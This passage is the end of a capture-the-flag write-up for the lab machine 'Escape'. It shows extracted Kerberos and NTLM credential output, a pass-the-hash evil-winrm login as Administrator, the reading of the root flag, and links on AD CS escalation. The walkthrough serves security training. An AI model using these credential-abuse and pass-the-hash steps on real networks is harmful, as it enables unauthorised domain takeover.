Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : L+lpk/StgkOyFMMrh9iqZw==
ASREP (key) : EC4663E701CB2C5EE89ABA4EB9AE443F
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
Establish a remote connection - Administrator
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Escape]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/3/2024 5:57 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root
Cannot find path 'C:\Users\Administrator\Desktop\root' because it does not exist.
At line:1 char:1
+ type root
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\Administrator\Desktop\root:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f4137a182926e2b16715f4ff4f332d77
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
References
[Stored procedures - MSSQL](https://book.hacktricks.xyz/pentesting-web/sql-injection/mssql-injection?source=post_page-----931dba100509--------------------------------#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures)
[GhostPack-Compiled Binaries](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/)
[AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation)
[From Misconfigured Certificate Template to Domain Admin](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin)
Lessons Learned